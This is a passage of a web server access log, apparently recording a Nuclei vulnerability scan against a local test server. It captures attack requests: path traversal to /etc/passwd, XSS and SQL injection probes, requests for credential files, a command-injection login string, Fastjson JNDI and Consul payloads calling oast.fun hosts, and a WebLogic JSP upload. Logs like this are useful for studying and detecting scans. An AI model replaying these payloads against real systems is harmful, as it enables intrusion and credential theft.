+{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /happyaxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebConsole/api/security/auth/loginServers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /updating.jsp?url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/mobile.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=mlw_quiz_list&s=\x22>&paged=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cxcum/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /portal-graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"user=pdnuclei%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actions/authenticate.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/upgrade.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22public\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v4/auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/firewall.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/sling/loginstatus.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws_utc/resources/setting/options HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.git-credentials HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.dockercfg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"{\x0D\x0A \x22b\x22:{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8h8gsmpv8c1qg07h0m4bsejmk8h3wo.oast.fun/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://c9v8h88smpv8c1ig07h0tp7n1e6db1xqd.oast.fun\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///system///sling///loginstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_name\x22\x0D\x0A\x0D\x0A297MTzFawHhaXedxFPDbtZn7wFP\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_edit_mode\x22\x0D\x0A\x0D\x0Afalse\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password_front\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password_changed\x22\x0D\x0A\x0D\x0Afalse\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_filename\x22; filename=\x22297MTzFawHhaXedxFPDbtZn7wFP.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2018-2894\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws_utc/resources/setting/keystore HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.054","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?p=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/go/km/navigation/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8h8gsmpv8c1qg07h0fdp54s3wroot4.oast.fun/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.docker/config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug.seam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"{\x22name\x22:\x22\x22,\x22before\x22:\x22\x22,\x22after\x22:\x22\x22,\x22direction\x22:\x22desc\x22,\x22order_by\x22:\x22date\x22,\x22num_of_rows\x22:100}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=C:\x5CProgramData\x5CVMware\x5CVMware+VirtualCenter\x5Cvcdb.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-laravel HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"{\x0D\x0A \x22ID\x22: \x22297MTueOR5VIOZBDhOPgZyLGY2M\x22,\x0D\x0A \x22Name\x22: \x22297MTueOR5VIOZBDhOPgZyLGY2M\x22,\x0D\x0A \x22Address\x22: \x22127.0.0.1\x22,\x0D\x0A \x22Port\x22: 80,\x0D\x0A \x22check\x22: {\x0D\x0A \x22script\x22: \x22nslookup c9v8h8gsmpv8c1qg07h0a9aeu9q58d6k6.oast.fun\x22,\x0D\x0A \x22interval\x22: \x2210s\x22,\x0D\x0A \x22Timeout\x22: \x2286400s\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /v1/agent/service/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", 